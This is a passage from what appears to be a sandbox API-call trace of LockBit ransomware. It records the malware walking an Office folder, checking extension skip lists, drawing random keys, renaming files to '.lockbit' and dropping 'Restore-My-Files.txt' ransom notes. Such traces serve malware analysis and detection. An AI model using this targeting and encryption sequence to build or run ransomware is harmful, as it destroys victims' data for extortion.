hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.658] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.659] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.660] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.660] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.661] free (_Block=0x1fa2ed8) [0199.661] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.661] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.661] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.666] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.666] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.666] WriteFile (in: hFile=0x3cc, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.667] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe4e1600, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcb67640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe4e1600, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18181_.WMF", cAlternateFileName="")) returned 1 [0199.667] lstrcmpiW (lpString1=".", lpString2="BD18181_.WMF") returned -1 [0199.668] lstrcmpiW (lpString1="..", lpString2="BD18181_.WMF") returned -1 [0199.668] PathFindExtensionW (pszPath="BD18181_.WMF") returned=".WMF" [0199.668] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.668] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.669] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.669] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18181_.WMF") returned 1 [0199.669] lstrcmpiW (lpString1="ntldr", lpString2="BD18181_.WMF") returned 1 [0199.669] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18181_.WMF") returned 1 [0199.669] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18181_.WMF") returned 1 [0199.669] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18181_.WMF") returned -1 [0199.669] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18181_.WMF") returned 1 [0199.670] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18181_.WMF") returned 1 [0199.670] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.670] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF") returned=".WMF" [0199.670] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.670] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.670] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.671] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.671] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.671] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.671] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.671] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.671] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.671] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF.lockbit") returned 79 [0199.671] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18181_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.673] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.673] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.673] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2862) returned 1 [0199.673] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.673] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.674] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.704] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.704] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.704] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.706] free (_Block=0x1fa2ed8) [0199.706] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.706] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.706] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce0000, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcb67640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa0ce0000, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0xc5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18182_.WMF", cAlternateFileName="")) returned 1 [0199.706] lstrcmpiW (lpString1=".", lpString2="BD18182_.WMF") returned -1 [0199.706] lstrcmpiW (lpString1="..", lpString2="BD18182_.WMF") returned -1 [0199.706] PathFindExtensionW (pszPath="BD18182_.WMF") returned=".WMF" [0199.706] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.706] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.706] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.706] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.706] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.706] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.706] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.707] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.707] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18182_.WMF") returned 1 [0199.708] lstrcmpiW (lpString1="ntldr", lpString2="BD18182_.WMF") returned 1 [0199.708] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18182_.WMF") returned 1 [0199.708] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18182_.WMF") returned 1 [0199.708] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18182_.WMF") returned -1 [0199.708] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18182_.WMF") returned 1 [0199.708] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18182_.WMF") returned 1 [0199.708] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.708] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF") returned=".WMF" [0199.708] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.708] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.708] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.709] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.709] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF.lockbit") returned 79 [0199.709] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18182_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.710] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.711] malloc (_Size=0x40068) returned 0x3df0008 [0199.711] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3166) returned 1 [0199.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.712] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.716] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.716] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.718] free (_Block=0x1fa2ed8) [0199.718] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.718] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.718] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe12d7e00, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcb67640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe12d7e00, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0xd22, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18184_.WMF", cAlternateFileName="")) returned 1 [0199.718] lstrcmpiW (lpString1=".", lpString2="BD18184_.WMF") returned -1 [0199.718] lstrcmpiW (lpString1="..", lpString2="BD18184_.WMF") returned -1 [0199.718] PathFindExtensionW (pszPath="BD18184_.WMF") returned=".WMF" [0199.718] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.718] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.719] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.719] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".dll", lpString2=".WMF") 